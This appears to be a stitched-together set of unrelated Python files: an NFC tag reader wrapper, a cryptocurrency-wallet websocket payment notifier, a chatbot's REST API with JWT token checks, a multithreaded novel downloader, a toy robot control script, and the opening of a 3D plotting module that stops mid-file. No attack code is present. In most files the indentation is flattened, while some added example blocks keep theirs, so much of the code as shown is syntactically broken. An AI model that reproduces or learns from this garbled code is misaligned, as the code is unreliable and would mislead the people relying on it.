pn7150.py
# https://gist.github.com/doronhorwitz/fc5c4234a9db9ed87c53213d79e63b6c
# https://www.nxp.com/docs/en/application-note/AN11697.pdf explains how to
# set up a demo of the PN7120/PN7150. That demo ships with an executable
# called "nfcDemoApp". This gist is a proof of concept for how to read from
# that executable in Python.
# The class (which is called PN7150, even though it should also support the
# PN7120) reads the output from the PN7150 each time a tag is read. It finds
# the line starting with "Text :" and extracts the text - which is the text
# stored on the NFC tag. The reading is done in a separate thread, which
# calls a callback with the text every time an NFC tag is read. Writing and
# single synchronous reads are also supported.
# Lots of inspiration and learning from various places including:
# https://github.com/NXPNFCLinux/linux_libnfc-nci/issues/49#issuecomment-326301669
# https://stackoverflow.com/a/4791612
# https://stackoverflow.com/a/38802275
# https://repolinux.wordpress.com/2012/10/09/non-blocking-read-from-stdin-in-python/
# https://stackoverflow.com/questions/18225816/indicate-no-more-input-without-closing-pty
import os
import pty
import shlex
import subprocess
import threading
_MAX_WRITE_RETRIES = 5
_OUTPUT_TEXT = "Text :"
_OUTPUT_TAG_WRITTEN = "Write Tag OK"
_OUTPUT_READ_FAILED = "Read NDEF Content Failed"
_OUTPUT_TAG_REMOVED = "NFC Tag Lost"
_CMD_POLL = "{nfc_demo_app_path} poll"
_CMD_WRITE = '{nfc_demo_app_path} write --type=Text -l en -r "{new_text}"'
_NFC_DEMO_APP_NAME = "nfcDemoApp"
_NFC_DEMO_APP_DEFAULT_LOCATION = "/usr/sbin"
class PN7150Exception(Exception):
pass
class PN7150:
"""
Can use this class as follows:
pn7150 = PN7150()
Start Continuous Reading
========================
def text_callback(text):
... do something with text
pn7150.when_tag_read = text_callback
pn7150.start_reading()
Stop Continuous Reading (be sure to do this before your program ends)
=======================
pn7150.stop_reading()
Read Once
=========
text = pn7150.read_once()
Write
=====
success = pn7150.write("some text")
"""
def __init__(self, nfc_demo_app_location=_NFC_DEMO_APP_DEFAULT_LOCATION):
self._nfc_demo_app_location = nfc_demo_app_location
self._read_running = False
self._proc = None
self._slave = None
self.when_tag_read = None
def _open_process(self, mode, **cmd_arguments):
if mode == "r":
cmd_string = _CMD_POLL
elif mode == "w":
cmd_string = _CMD_WRITE
else:
raise PN7150Exception("mode must be 'r' or 'w'")
cmd = cmd_string.format(
nfc_demo_app_path=self._nfc_demo_app_path, **cmd_arguments
)
master, slave = pty.openpty()
proc = subprocess.Popen(
shlex.split(cmd), stdin=subprocess.PIPE, stdout=slave, stderr=slave
)
stdout = os.fdopen(master)
return proc, slave, stdout
    def _read_thread(self):
        # _read_running is set by start_reading() before this thread starts,
        # so a second call to start_reading() cannot spawn a duplicate thread
        self._proc, self._slave, stdout = self._open_process("r")
while self._read_running:
try:
line = stdout.readline()
if _OUTPUT_TEXT in line:
first = line.find("'")
last = line.rfind("'")
text = line[first + 1 : last]
if self.when_tag_read:
self.when_tag_read(text)
except OSError:
pass
@property
def _nfc_demo_app_path(self):
return os.path.join(self._nfc_demo_app_location, _NFC_DEMO_APP_NAME)
    def start_reading(self):
        if not self._read_running:
            self._read_running = True
            thread = threading.Thread(target=self._read_thread)
            thread.start()
def stop_reading(self):
if self._read_running:
self._proc.terminate()
self._read_running = False
os.close(self._slave)
def read_once(self, wait_for_tag_removal=True):
if self._read_running:
raise PN7150Exception("cannot read_once while a continuous read is running")
proc, slave, stdout = self._open_process("r")
been_read = False
been_removed = not wait_for_tag_removal
text = None
while not been_read or not been_removed:
line = stdout.readline()
if _OUTPUT_TEXT in line:
first = line.find("'")
last = line.rfind("'")
text = line[first + 1 : last]
been_read = True
elif _OUTPUT_READ_FAILED in line:
been_read = True
elif _OUTPUT_TAG_REMOVED in line:
been_removed = True
proc.terminate()
os.close(slave)
return text
def _write(self, new_text, wait_for_tag_removal=True):
proc, slave, stdout = self._open_process("w", new_text=new_text)
been_written = False
been_checked = False
been_removed = not wait_for_tag_removal
checked_text = None
while not been_written or not been_checked or not been_removed:
line = stdout.readline()
if _OUTPUT_TAG_WRITTEN in line:
been_written = True
elif been_written and _OUTPUT_TEXT in line:
first = line.find("'")
last = line.rfind("'")
checked_text = line[first + 1 : last]
been_checked = True
elif _OUTPUT_TAG_REMOVED in line:
been_removed = True
proc.terminate()
os.close(slave)
return checked_text == new_text
def write(self, new_text, wait_for_tag_removal=True):
if self._read_running:
raise PN7150Exception("cannot write while a continuous read is running")
existing_text = self.read_once(wait_for_tag_removal=wait_for_tag_removal)
success = False
if existing_text != new_text:
count = 0
while not success and count < _MAX_WRITE_RETRIES:
success = self._write(
new_text, wait_for_tag_removal=wait_for_tag_removal
)
return success
else:
success = True
return success
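# --- Example usage: a hedged, minimal sketch (not part of the original gist).
# It assumes nfcDemoApp is installed in the default location and a PN7120/
# PN7150 board is attached; pass nfc_demo_app_location otherwise.
if __name__ == "__main__":
    import time

    def _on_tag(text):
        # called from the reader thread for every tag that is scanned
        print("tag text:", text)

    pn7150 = PN7150()
    pn7150.when_tag_read = _on_tag
    pn7150.start_reading()
    try:
        time.sleep(30)  # scan tags for 30 seconds
    finally:
        pn7150.stop_reading()  # always stop before the program ends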
websockets.py
#!/usr/bin/env python
#
# Electrum-Ganja - lightweight Ganjacoin client
# Copyright (C) 2015 Thomas Voegtlin
# Copyright (C) 2018 GanjaProject
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import queue
import threading, os, json
from collections import defaultdict
try:
from SimpleWebSocketServer import WebSocket, SimpleSSLWebSocketServer
except ImportError:
import sys
sys.exit("install SimpleWebSocketServer")
from . import util
request_queue = queue.Queue()
class Electrum_GanjaWebSocket(WebSocket):
def handleMessage(self):
assert self.data[0:3] == 'id:'
util.print_error("message received", self.data)
request_id = self.data[3:]
request_queue.put((self, request_id))
def handleConnected(self):
util.print_error("connected", self.address)
def handleClose(self):
util.print_error("closed", self.address)
class WsClientThread(util.DaemonThread):
def __init__(self, config, network):
util.DaemonThread.__init__(self)
self.network = network
self.config = config
self.response_queue = queue.Queue()
self.subscriptions = defaultdict(list)
def make_request(self, request_id):
# read json file
rdir = self.config.get('requests_dir')
n = os.path.join(rdir, 'req', request_id[0], request_id[1], request_id, request_id + '.json')
with open(n, encoding='utf-8') as f:
s = f.read()
d = json.loads(s)
addr = d.get('address')
amount = d.get('amount')
return addr, amount
def reading_thread(self):
while self.is_running():
try:
                ws, request_id = request_queue.get(timeout=0.1)
except queue.Empty:
continue
try:
addr, amount = self.make_request(request_id)
            except Exception:
continue
l = self.subscriptions.get(addr, [])
l.append((ws, amount))
self.subscriptions[addr] = l
#self.network.subscribe_to_addresses([addr], self.response_queue.put)
self.network.send([('blockchain.address.subscribe', [addr])], self.response_queue.put)
def run(self):
threading.Thread(target=self.reading_thread).start()
while self.is_running():
try:
r = self.response_queue.get(timeout=0.1)
except queue.Empty:
continue
util.print_error('response', r)
method = r.get('method')
params = r.get('params')
result = r.get('result')
if result is None:
continue
if method == 'blockchain.address.subscribe':
self.network.send([('blockchain.address.get_balance', params)], self.response_queue.put)
elif method == 'blockchain.address.get_balance':
h = params[0]
addr = self.network.h2addr.get(h, None)
                if addr is None:
                    util.print_error("can't find address for scripthash: %s" % h)
                    continue
l = self.subscriptions.get(addr, [])
for ws, amount in l:
if not ws.closed:
                        if sum(result.values()) >= amount:
ws.sendMessage('paid')
class WebSocketServer(threading.Thread):
def __init__(self, config, ns):
threading.Thread.__init__(self)
self.config = config
self.net_server = ns
self.daemon = True
def run(self):
t = WsClientThread(self.config, self.net_server)
t.start()
host = self.config.get('websocket_server')
port = self.config.get('websocket_port', 9999)
certfile = self.config.get('ssl_chain')
keyfile = self.config.get('ssl_privkey')
self.server = SimpleSSLWebSocketServer(host, port, Electrum_GanjaWebSocket, certfile, keyfile)
self.server.serveforever()
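# --- Hedged example client (not part of Electrum): the protocol above expects
# a single message of the form "id:<request_id>" and answers with 'paid' once
# the subscribed address holds at least the requested amount. Assumes the
# third-party websocket-client package (pip install websocket-client).
def example_wait_for_payment(request_id, host='localhost', port=9999):
    import ssl
    import websocket
    ws = websocket.create_connection(
        'wss://%s:%d/' % (host, port),
        sslopt={'cert_reqs': ssl.CERT_NONE})  # demo only: skip cert checks
    ws.send('id:' + request_id)  # handleMessage() requires the 'id:' prefix
    reply = ws.recv()            # blocks until the server sends 'paid'
    ws.close()
    return reply == 'paid'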
api.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
.. module:: api
:platform: Unix
:synopsis: the API of Dragonfire that contains the endpoints.
.. moduleauthor:: Mehmet Mert Yıldıran <mert.yildiran@bil.omu.edu.tr>
"""
from threading import Thread # Thread-based parallelism
import json # JSON encoder and decoder
import re # Regular expression operations
from random import randrange # Generate pseudo-random numbers
from datetime import datetime # Basic date and time types
from dragonfire.config import Config # Credentials for the database connection
from dragonfire.arithmetic import arithmetic_parse # Submodule of Dragonfire to analyze arithmetic expressions
from dragonfire.database import User, Notification # Submodule of Dragonfire module that contains the database schema
from dragonfire.utilities import TextToAction # Submodule of Dragonfire to provide various utilities
import hug # Embrace the APIs of the future
from hug_middleware_cors import CORSMiddleware # Middleware for allowing CORS (cross-origin resource sharing) requests from hug servers
import waitress # A production-quality pure-Python WSGI server with very acceptable performance
import wikipedia as wikipedia_lib # Python library that makes it easy to access and parse data from Wikipedia
import youtube_dl # Command-line program to download videos from YouTube.com and other video sites
import jwt # JSON Web Token implementation in Python
from sqlalchemy.orm.exc import NoResultFound # the Python SQL toolkit and Object Relational Mapper
@hug.authentication.token
def token_authentication(token):
"""Method to compare the given token with precomputed token.
Args:
token (str): API token.
Returns:
bool. The return code::
True -- The token is correct!
False -- The token is invalid!
"""
    try:
        jwt.decode(token, Config.SUPER_SECRET_KEY, algorithms=['HS256'])
        return True
    except Exception:
        return False
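def _example_mint_token(name, gender, birth_date, user_id=1):
    """Hedged example (not used by Dragonfire itself): mint a token that
    token_authentication() above accepts, mirroring what /register issues."""
    payload = {'id': user_id, 'name': name, 'gender': gender,
               'birth_date': birth_date}
    return jwt.encode(payload, Config.SUPER_SECRET_KEY,
                      algorithm='HS256').decode('ascii')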
# Natural Language Processing related API endpoints START
@hug.post('/tag', requires=token_authentication)
def tagger_end(text):
"""**Endpoint** to return **POS Tagging** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(tagger(text), indent=4)
def tagger(text):
"""Method to encapsulate **POS Tagging** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for token in doc:
parse = {
'text': token.text,
'lemma': token.lemma_,
'pos': token.pos_,
'tag': token.tag_,
'dep': token.dep_,
'shape': token.shape_,
'is_alpha': token.is_alpha,
'is_stop': token.is_stop
}
data.append(parse)
return data
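def _example_call_tag(token, text, base_url='http://localhost:8000'):
    """Hedged example client (not part of the API itself): hug's token
    authentication reads the raw token from the Authorization header.
    Assumes the `requests` package is installed."""
    import requests
    r = requests.post(base_url + '/tag',
                      data={'text': text},
                      headers={'Authorization': token})
    return json.loads(r.text)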
@hug.post('/dep', requires=token_authentication)
def dependency_parser_end(text):
"""**Endpoint** to return **Dependency Parse** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(dependency_parser(text), indent=4)
def dependency_parser(text):
"""Method to encapsulate **Dependency Parse** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for chunk in doc.noun_chunks:
parse = {
'text': chunk.text,
'root_text': chunk.root.text,
'root_dep': chunk.root.dep_,
'root_head_text': chunk.root.head.text,
}
data.append(parse)
return data
@hug.post('/ner', requires=token_authentication)
def entity_recognizer_end(text):
"""**Endpoint** to return **Named Entity Recognition** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(entity_recognizer(text), indent=4)
def entity_recognizer(text):
"""Method to encapsulate **Named Entity Recognition** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for ent in doc.ents:
parse = {
'text': ent.text,
'start_char': ent.start_char,
'end_char': ent.end_char,
'label': ent.label_,
}
data.append(parse)
return data
@hug.post('/token', requires=token_authentication)
def tokenizer_end(text):
"""**Endpoint** to **tokenize** the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(tokenizer(text), indent=4)
def tokenizer(text):
"""Method to encapsulate **tokenization** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for token in doc:
data.append(token.text)
return data
@hug.post('/sent', requires=token_authentication)
def sentence_segmenter_end(text):
"""**Endpoint** to return **Sentence Segmentation** result of the given text.
Args:
text (str): Text.
Returns:
JSON document.
"""
return json.dumps(sentence_segmenter(text), indent=4)
def sentence_segmenter(text):
"""Method to encapsulate **Sentence Segmentation** process.
Args:
text (str): Text.
Returns:
(list) of (dict)s: List of dictionaries.
"""
data = []
doc = nlp(text)
for sent in doc.sents:
data.append(sent.text)
return data
# All-in-One NLP
@hug.post('/cmd', requires=token_authentication)
def cmd(text):
"""Serves the **all Natural Language Processing features** (parsers) of :mod:`spacy` in a single **endpoint**.
Combines the results of these methods into a single JSON document:
- :func:`dragonfire.api.tagger` method (**POS Tagging**)
- :func:`dragonfire.api.dependency_parser` method (**Dependency Parse**)
- :func:`dragonfire.api.entity_recognizer` method (**Named Entity Recognition**)
Args:
text (str): Text.
Returns:
JSON document.
"""
data = []
sents = sentence_segmenter(text)
for sent in sents:
sent_data = {}
sent_data['tags'] = tagger(sent)
sent_data['deps'] = dependency_parser(sent)
sent_data['ners'] = entity_recognizer(sent)
data.append(sent_data)
return json.dumps(data, indent=4)
# Natural Language Processing related API endpoints END
# Directly on server-side Q&A related API endpoints START
@hug.post('/math', requires=token_authentication)
def math(text):
"""**Endpoint** to return the response of :func:`dragonfire.arithmetic.arithmetic_parse` function.
Args:
text (str): Text.
Returns:
JSON document.
"""
response = arithmetic_parse(text)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/learn', requires=token_authentication)
def learn(text, user_id):
"""**Endpoint** to return the response of :func:`dragonfire.learn.Learner.respond` method.
Args:
text (str): Text.
user_id (int): User's ID.
Returns:
JSON document.
"""
response = learner.respond(text, is_server=True, user_id=user_id)
if not response:
response = ""
return json.dumps(response, indent=4)
@hug.post('/omni', requires=token_authentication)
def omni(text, gender_prefix):
"""**Endpoint** to return the answer of :func:`dragonfire.odqa.ODQA.respond` method.
Args:
text (str): Text.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
answer = odqa.respond(text, userin=userin, user_prefix=gender_prefix, is_server=True)
if not answer:
answer = ""
return json.dumps(answer, indent=4)
@hug.post('/deep', requires=token_authentication)
def deep(text, gender_prefix):
"""**Endpoint** to return the response of :func:`dragonfire.deepconv.DeepConversation.respond` method.
Args:
text (str): Text.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
answer = dc.respond(text, user_prefix=gender_prefix)
return json.dumps(answer, indent=4)
# All-in-One Answering
@hug.post('/answer', requires=token_authentication)
def answer(text, gender_prefix, user_id, previous=None):
"""Serves the **all Q&A related API endpoints** in a single **endpoint**.
Combines the results of these methods into a single JSON document:
- :func:`dragonfire.arithmetic.arithmetic_parse` function
- :func:`dragonfire.learn.Learner.respond` method
- :func:`dragonfire.odqa.ODQA.respond` method
- :func:`dragonfire.deepconv.DeepConversation.respond` method
Args:
text (str): User's current command.
gender_prefix (str): Prefix to address/call user when answering.
user_id (int): User's ID.
previous (str): User's previous command.
Returns:
JSON document.
"""
data = {}
text = coref.resolve_api(text, previous)
subject, subjects, focus, subject_with_objects = odqa.semantic_extractor(text)
data['subject'] = subject
data['focus'] = focus
answer = arithmetic_parse(text)
if not answer:
answer = learner.respond(text, is_server=True, user_id=user_id)
if not answer:
answer = odqa.respond(text, userin=userin, user_prefix=gender_prefix, is_server=True)
if not answer:
answer = dc.respond(text, user_prefix=gender_prefix)
data['answer'] = answer
return json.dumps(data, indent=4)
# Directly on server-side Q&A related API endpoints END
@hug.post('/wikipedia', requires=token_authentication)
def wikipedia(query, gender_prefix):
"""**Endpoint** to make a **Wikipedia search** and return its **text content**.
Args:
query (str): Search query.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
global userin
response = ""
url = ""
wikiresult = wikipedia_lib.search(query)
if len(wikiresult) == 0:
response = "Sorry, " + gender_prefix + ". But I couldn't find anything about " + query + " in Wikipedia."
else:
wikipage = wikipedia_lib.page(wikiresult[0])
wikicontent = TextToAction.fix_the_encoding_in_text_for_tts(wikipage.content)
wikicontent = re.sub(r'\([^)]*\)', '', wikicontent)
response = " ".join(sentence_segmenter(wikicontent)[:3])
url = wikipage.url
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/youtube', requires=token_authentication)
def youtube(query, gender_prefix):
"""**Endpoint** to make a **YouTube search** and return the **video title** and **URL**.
Args:
query (str): Search query.
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
response = ""
url = ""
info = youtube_dl.YoutubeDL({}).extract_info('ytsearch:' + query, download=False, ie_key='YoutubeSearch')
if len(info['entries']) > 0:
response = info['entries'][0]['title']
url = "https://www.youtube.com/watch?v=%s" % (info['entries'][0]['id'])
response = "".join([
i if ord(i) < 128 else ' '
for i in response
])
else:
response = "No video found, " + gender_prefix + "."
data = {}
data['response'] = response
data['url'] = url
return json.dumps(data, indent=4)
@hug.post('/notification', requires=token_authentication)
def notification(user_id, location, gender_prefix, response=None):
"""**Endpoint** to serve the **notifications** from the **database**.
Args:
user_id (int): User's ID.
location (str): *Development in progress...*
gender_prefix (str): Prefix to address/call user when answering.
Returns:
JSON document.
"""
try:
user = db_session.query(User).filter(User.id == int(user_id)).one()
        notifications = db_session.query(Notification).filter(Notification.is_active)
        if notifications.count() == 0:
            response.status = hug.HTTP_404
            return
        rand = randrange(0, notifications.count())
        notification = notifications[rand]
if notification.capitalize == 1:
gender_prefix = gender_prefix.capitalize()
data = {}
data['url'] = notification.url
data['title'] = notification.title
data['message'] = notification.message.format(gender_prefix, user.name)
return json.dumps(data, indent=4)
except NoResultFound:
response.status = hug.HTTP_404
return
# Endpoint to handle registration requests
@hug.post('/register')
def register(name, gender, birth_date, reg_key, response=None):
"""**Endpoint** to handle **registration requests**.
Args:
name (str): User's name.
gender (str): User's gender.
birth_date (str): User's birth date.
reg_key (str): Registration key.
Returns:
JSON document.
"""
if reg_key != server_reg_key:
response.status = hug.HTTP_403
return
new_user = User(name=name, gender=gender, birth_date=datetime.strptime(birth_date, "%Y-%m-%d").date())
db_session.add(new_user)
db_session.commit()
data = {}
data['id'] = new_user.id
data['token'] = jwt.encode({'id': new_user.id, 'name': name, 'gender': gender, 'birth_date': birth_date}, Config.SUPER_SECRET_KEY, algorithm='HS256').decode('ascii')
return json.dumps(data, indent=4)
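def _example_register(name, gender, birth_date, reg_key,
                      base_url='http://localhost:8000'):
    """Hedged example client for the /register endpoint above (an assumption,
    not shipped with Dragonfire). Assumes the `requests` package; returns a
    dict with the new user's 'id' and 'token'."""
    import requests
    r = requests.post(base_url + '/register',
                      data={'name': name, 'gender': gender,
                            'birth_date': birth_date, 'reg_key': reg_key})
    return json.loads(r.text)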
class Run():
"""Class to Run the API.
.. note::
        Creating an object from this class automatically starts the API server.
"""
def __init__(self, nlp_ref, learner_ref, odqa_ref, dc_ref, coref_ref, userin_ref, reg_key, port_number, db_session_ref, dont_block=False):
"""Initialization method of :class:`dragonfire.api.Run` class
This method starts an API server using :mod:`waitress` (*a pure-Python WSGI server*)
on top of lightweight :mod:`hug` API framework.
Args:
nlp_ref: :mod:`spacy` model instance.
learner_ref: :class:`dragonfire.learn.Learner` instance.
odqa_ref: :class:`dragonfire.odqa.ODQA` instance.
            dc_ref: :class:`dragonfire.deepconv.DeepConversation` instance.
            coref_ref: coreference resolver instance used by the /answer endpoint.
            userin_ref: :class:`dragonfire.utilities.TextToAction` instance.
            reg_key (str): Registration key of the API.
            port_number (int): Port number on which the API will be served.
            db_session_ref: SQLAlchemy's :class:`DBSession()` instance.
            dont_block (bool): If True, serve on a daemon thread and return immediately.
"""
global __hug_wsgi__ # Fixes flake8 F821: Undefined name
global nlp
global learner
global odqa
global dc
global coref
global userin
global server_reg_key
global db_session
nlp = nlp_ref # Load en_core_web_sm, English, 50 MB, default model
learner = learner_ref
odqa = odqa_ref
dc = dc_ref
coref = coref_ref
userin = userin_ref
server_reg_key = reg_key
db_session = db_session_ref
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
self.waitress_thread = Thread(target=waitress.serve, args=(__hug_wsgi__, ), kwargs={"port": port_number})
if dont_block:
self.waitress_thread.daemon = True
self.waitress_thread.start()
if not dont_block:
self.waitress_thread.join()
if __name__ == '__main__':
global __hug_wsgi__ # Fixes flake8 F821: Undefined name
app = hug.API(__name__)
app.http.output_format = hug.output_format.text
app.http.add_middleware(CORSMiddleware(app))
waitress.serve(__hug_wsgi__, port=8000)
novelSpider.py
import time
import queue
import threading
from modules import noveldownload
from modules import search
def work(q):
    while True:
        try:
            # get_nowait() avoids the race between q.empty() and q.get()
            # when several worker threads drain the same queue
            r = q.get_nowait()
        except queue.Empty:
            return
        url = r['url']
        novelName = r['name']
        tid = r['index']
        print("threadId-{} novelName-{}, url-{} downloading...".format(tid, novelName, url))
        noveldownload.get_novel_by_home_url(url)
        print("threadId-{} novelName-{}, url-{} finished.".format(tid, novelName, url))
def main(searchResultGroup, condition, thread_num=5):
q = queue.Queue()
for r in searchResultGroup:
if condition['isSameName']:
if r['name'] == condition['searchKey']:
q.put(r)
else:
q.put(r)
threads = []
for i in range(thread_num):
t = threading.Thread(target=work, args=(q,))
threads.append(t)
for i in range(thread_num):
threads[i].start()
for i in range(thread_num):
threads[i].join()
if __name__ == "__main__":
start = time.time()
novelSource = 'shuquge'
# novelSource = 'soshuw'
searchKey = '傲世九重天'
search.initNovelSource(novelSource)
noveldownload.initNovelSource(novelSource)
condition = {}
condition['isSameName'] = True
condition['searchKey'] = searchKey
    searchResultGroup = search.get_search_result_group_by_search_key(searchKey, novelSource)
    print(searchResultGroup)
    main(searchResultGroup, condition)
    print('Elapsed time:', time.time() - start)
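# --- Hedged example (assumed record shape, not part of the spider): work()
# expects each queue record to be a dict with 'url', 'name' and 'index' keys,
# so a hypothetical result list could look like:
#
#   fake_results = [
#       {'index': 0, 'name': 'Some Novel', 'url': 'https://example.com/book/1/'},
#       {'index': 1, 'name': 'Some Novel', 'url': 'https://example.com/book/2/'},
#   ]
#   main(fake_results, {'isSameName': False, 'searchKey': ''}, thread_num=2)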
beo_threads.py
"""Activates arm mirror, changes eyes and says a short sentence every few seconds"""
from time import sleep
from random import randint
import subprocess
import threading
from Movements import Movements
from Audio import Audio
from Eyes import Eyes
MOVEMENTS = Movements()
AUDIO = Audio()
EYES = Eyes()
def arm_mirror():
"""Makes the angle of beo's left arm match the angle of beo's right arm"""
MOVEMENTS.disable_all_joints()
while True:
for i in range(3):
angle = MOVEMENTS.get_raw_angle(i*2)
            MOVEMENTS.set_raw_angle(i*2 + 1, angle)
sleep(0.01)
def eye_change():
"""Changes beo's eye expressions every few seconds"""
expressions = ['wink', 'shut', 'sad', 'mad', 'default']
while True:
for i in expressions:
EYES.set_expression(i)
sleep(20)
def speak():
"""Says a short sentence every few seconds"""
sentences = ['DESTROY ALL HU- I MEAN GREETINGS MEAT BAG',
'She sells sea shells by the sea shore', 'Other sentence']
while True:
        AUDIO.speak(sentences[randint(0, len(sentences) - 1)])  # pick a random sentence
sleep(15)
def nod():
"""Moves beo's had back and forth every few seconds"""
while True:
MOVEMENTS.set_raw_angle(7, 52)
sleep(2)
MOVEMENTS.set_raw_angle(7, 0)
sleep(2)
def camera():
"""Takes a picture every minute"""
while True:
subprocess.check_output(['fswebcam', 'image.jpg'])
sleep(60)
def main():
"""Main function, creates the threads"""
thread1 = threading.Thread(target=arm_mirror)
thread2 = threading.Thread(target=eye_change)
thread3 = threading.Thread(target=speak)
thread4 = threading.Thread(target=nod)
thread5 = threading.Thread(target=camera)
#Starts the threads.
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
#Joins the threads
thread1.join()
thread2.join()
thread3.join()
thread4.join()
thread5.join()
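def main_daemon():
    """Hedged alternative to main() (an assumption, not part of the original
    script): daemon threads die with the main thread, so Ctrl-C exits the
    program cleanly instead of blocking forever in join()."""
    workers = [threading.Thread(target=f, daemon=True)
               for f in (arm_mirror, eye_change, speak, nod, camera)]
    for thread in workers:
        thread.start()
    try:
        while True:
            sleep(1)  # keep the main thread alive
    except KeyboardInterrupt:
        pass  # daemon threads are killed when the main thread exits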
if __name__ == "__main__":
main()
plotting.py
"""
pyvista plotting module
"""
import collections
import collections.abc
import logging
import os
import time
from threading import Thread
import imageio
import numpy as np
import scooby
import vtk
from vtk.util import numpy_support as VN
import pyvista
from pyvista.utilities import (convert_array, convert_string_array,
get_array, is_pyvista_dataset, numpy_to_texture,
raise_not_matching, wrap)
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .theme import *
from .tools import *
from .widgets import WidgetHelper
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory"""
for key, p in _ALL_PLOTTERS.items():
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
class BasePlotter(PickingHelper, WidgetHelper):
"""
To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
"""
def __new__(cls, *args, **kwargs):
if cls is BasePlotter:
raise TypeError("pyvista.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None):
""" Initialize base plotter """
self.image_transparent_background = rcParams['transparent_background']
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self.renderers = []
self._active_renderer_index = 0
assert_str = '"shape" should be a list or tuple'
        assert isinstance(shape, collections.abc.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = pyvista.Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
# This keeps track of scalar names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = vtk.vtkInteractorStyleRubberBandPick()
# Add self to open plotters
_ALL_PLOTTERS[str(hex(id(self)))] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
# Key bindings
self.reset_key_events()
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed. These are
non-unique - thus a key could map to many callback functions.
The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
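    # Hedged usage sketch for add_key_event (assumes an interactive session):
    #
    #   plotter = pyvista.Plotter()
    #   plotter.add_mesh(pyvista.Sphere())
    #   plotter.add_key_event('m', lambda: print('m was pressed'))
    #   plotter.show()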
def clear_events_for_key(self, key):
self._key_press_event_callbacks.pop(key)
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
def _close_callback():
""" Make sure a screenhsot is acquired before closing"""
self.q_pressed = True
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.add_key_event('q', _close_callback)
b_left_down_callback = lambda: self.iren.AddObserver('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
def key_press_event(self, obj, event):
""" Listens for key press event """
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
